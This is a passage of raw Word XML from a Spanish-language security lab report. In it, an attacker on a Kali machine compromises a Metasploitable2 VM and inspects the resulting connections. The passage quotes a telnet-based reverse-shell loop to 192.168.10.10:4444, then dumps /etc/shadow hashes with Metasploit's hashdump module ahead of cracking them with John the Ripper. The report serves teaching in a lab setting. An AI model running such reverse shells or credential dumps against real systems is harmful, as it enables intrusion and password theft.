        <w:t xml:space="preserve">metasploitable2" las conexiones </w:t>
      </w:r>
      <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>establecidas y los nuevos procesos ejecutados relacionados con la c</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>onexión entre las dos máquinas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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43425" cy="2314575"/>
                <wp:effectExtent l="0" t="0" r="28575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- Mostramos las conexiones con el puerto 4444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do</w:t>
                            </w:r>
                            <w:proofErr w:type="gram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stat</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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op</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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grep 4444</w:t>
                            </w:r>
                          </w:p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- Mostramos los procesos relacionados con la primera conexión.</w:t>
                            </w:r>
                          </w:p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proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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x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grep &lt;PID asociado a primer telnet&gt;</w:t>
                            </w:r>
                          </w:p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- Mostramos los procesos relacionados con la segunda conexión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proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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x</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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grep &lt;PID asociado a primer telnet&gt;</w:t>
                            </w:r>
                          </w:p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- Mostramos los procesos asociados con el puerto 4444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proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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x</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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grep 4444</w:t>
                            </w:r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0;width:357.75pt;height:182.2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">
                <v:textbox>
                  <w:txbxContent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1.- Mostramos las conexiones con el puerto 4444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sudo</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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netstat</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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naop</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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grep 4444</w:t>
                      </w:r>
                    </w:p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2.- Mostramos los procesos relacionados con la primera conexión.</w:t>
                      </w:r>
                    </w:p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ps</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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aux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grep &lt;PID asociado a primer telnet&gt;</w:t>
                      </w:r>
                    </w:p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3.- Mostramos los procesos relacionados con la segunda conexión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ps</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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aux</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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grep &lt;PID asociado a primer telnet&gt;</w:t>
                      </w:r>
                    </w:p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4.- Mostramos los procesos asociados con el puerto 4444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ps</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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aux</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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grep 4444</w:t>
                      </w:r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  <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF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6672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="0092277A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Como se ha podido ver en los puntos dos y tres, hay dos procesos li</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">gados a la conexión establecida </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>entre las dos máquina; sin embargo, se ha comprobado en el punto c</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">uatro que hay un tercer proceso </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ejecutando el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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5500" cy="647700"/>
                <wp:effectExtent l="0" t="0" r="19050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ED" w:rsidRDefault="00315FF1" w:rsidP="007B26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  <w:proofErr w:type="gram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c (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eep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197|telnet 192.168.10.10 4444|while : ; do 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&amp; break; done 2&gt;&amp;1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00315FF1" w:rsidRPr="00AC7BED" w:rsidRDefault="00315FF1" w:rsidP="007B2631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telnet 192.168.10.10 4444 &gt;/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&gt;&amp;1 &amp;)</w:t>
                            </w:r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0;width:465pt;height:51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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00AC7BED" w:rsidRDefault="00315FF1" w:rsidP="007B26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sh</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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c (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sleep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197|telnet 192.168.10.10 4444|while : ; do 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sh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&amp; break; done 2&gt;&amp;1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="00AC7BED" w:rsidRDefault="00315FF1" w:rsidP="007B2631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|telnet 192.168.10.10 4444 &gt;/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dev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null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&gt;&amp;1 &amp;)</w:t>
                      </w:r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  <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7BED" w:rsidRPr="006672BF" w:rsidRDefault="00AC7BED" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="0092277A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 xml:space="preserve">El comando se ejecuta en segundo plano, y consiste en un bucle </w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">encargado de redirigir toda la </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>información obtenida de la conexión a un fichero</w:t>
      </w:r>
      <w:r w:rsidR="0092277A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para que se elimine</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, tanto la salida estándar, como la salida de error.</w:t>
      </w:r>
      <w:r w:rsidR="0092277A"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 xml:space="preserve">El propósito principal es </w:t>
      </w:r>
      <w:r w:rsidR="00D04B95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>conseguir que la máquina que ha sido objeto del ataque se cone</w:t>
      </w:r>
      <w:r w:rsidR="00A55636">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>cte a ti, en vez de tú</w:t>
      </w:r>
      <w:r w:rsidR="00D04B95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a ella. Esto se realiza ya que es probable que no siempre se pueda realizar el ataque con éxito para conectarse, y de este modo ya no hace falta, ya que se conecta ella a ti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005767B8" w:rsidRDefault="005767B8" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092277A" w:rsidRPr="006672BF" w:rsidRDefault="0092277A" w:rsidP="0092277A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="00315FF1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Parte III: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Crackear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> contraseñas con John </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Ripper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="007B2631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En este tercer apartado de la práctica, se va a intentar obtener la co</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ntraseña del usuario "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>de la máquina "metasploitable2". Para ello, en primer lugar, se va a ca</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">mbiar la contraseña del usuario </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>por una palabra en inglés (en nuestro caso "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>computer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"). Ahora, se pr</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ocede a pasar la sesión abierta </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>en el apartado 2 en la máquina "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>" a segundo plano</w:t>
      </w:r>
      <w:r w:rsidR="007B2631"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>(aquella en la que</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> se había accedido a la máquina </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comprometida). </w:t>
      </w:r>
      <w:r w:rsidR="007B2631" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Esto</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> se consigue pulsando simultáneamente "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt; y Z", y</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comprobando si se ha realizado </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>correctamente mostrando las sesiones abiertas con "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="007B2631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A continuación se escoge un nuevo módulo, en este caso, para obtener los hashes de las c</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ontraseñas </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">contenidas en </w:t>
      </w:r>
      <w:r w:rsidR="007B2631">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B2631">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la máquina comprometida. El procedimi</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ento es análogo al del apartado </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>anterior, pero eligiendo el módulo correspondiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="006672BF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29225" cy="771525"/>
                <wp:effectExtent l="0" t="0" r="28575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27" w:rsidRPr="00D22027" w:rsidRDefault="00315FF1" w:rsidP="00D2202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</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd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t/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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ux</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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ther</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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hdump</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00D22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(selecciona el módulo)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00315FF1" w:rsidRPr="007B2631" w:rsidRDefault="00315FF1" w:rsidP="00D2202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w</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd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tions</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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B2631"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4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D4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D4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muestra las opciones)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00D22027" w:rsidRDefault="00315FF1" w:rsidP="00D2202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</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd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SSION 1 </w:t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D4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(cambia a la sesión abiert</w:t>
                            </w:r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previamente)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00315FF1" w:rsidRPr="007B2631" w:rsidRDefault="00315FF1" w:rsidP="00D2202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loit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd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D4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D4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B2631"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ejecuta el código)</w:t>
                            </w:r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0;width:411.75pt;height:60.7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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00D22027" w:rsidRPr="00D22027" w:rsidRDefault="00315FF1" w:rsidP="00D2202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use</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd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t/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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linux</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd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gather</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd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hashdump</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D220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(selecciona el módulo)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="007B2631" w:rsidRDefault="00315FF1" w:rsidP="00D2202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show</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd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options</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd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B2631"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D426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D426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D426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(muestra las opciones)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00D22027" w:rsidRDefault="00315FF1" w:rsidP="00D2202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set</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd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SSION 1 </w:t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D426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(cambia a la sesión abiert</w:t>
                      </w:r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a previamente)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="007B2631" w:rsidRDefault="00315FF1" w:rsidP="00D2202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exploit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd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D426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D426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B2631"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(ejecuta el código)</w:t>
                      </w:r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6672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="007B2631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Como salida</w:t>
      </w:r>
      <w:r w:rsidR="007B2631">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> se obtiene el contenido del fichero nombrado por panta</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">lla, y además, se guardan dicha </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">información en el fichero cuyo nombre viene precedido en la pantalla </w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>por "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unshadowed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> File":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="006672BF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5900" cy="276225"/>
                <wp:effectExtent l="0" t="0" r="19050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F1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1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/root/.msf4/loot/20161005212210_default_192.168.10.11_linux.hashes_678734.txt</w:t>
                            </w:r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0;margin-top:0;width:417pt;height:21.7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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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/root/.msf4/loot/20161005212210_default_192.168.10.11_linux.hashes_678734.txt</w:t>
                      </w:r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</w:p>
    <w:p w:rsidR="00315FF1" w:rsidRDefault="00315FF1" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="007B2631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Finalmente, ya sólo queda obtener las contraseñas mediante la herram</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ienta de obtención de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00315FF1"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 xml:space="preserve">por fuerza bruta llamada "John </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ripper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
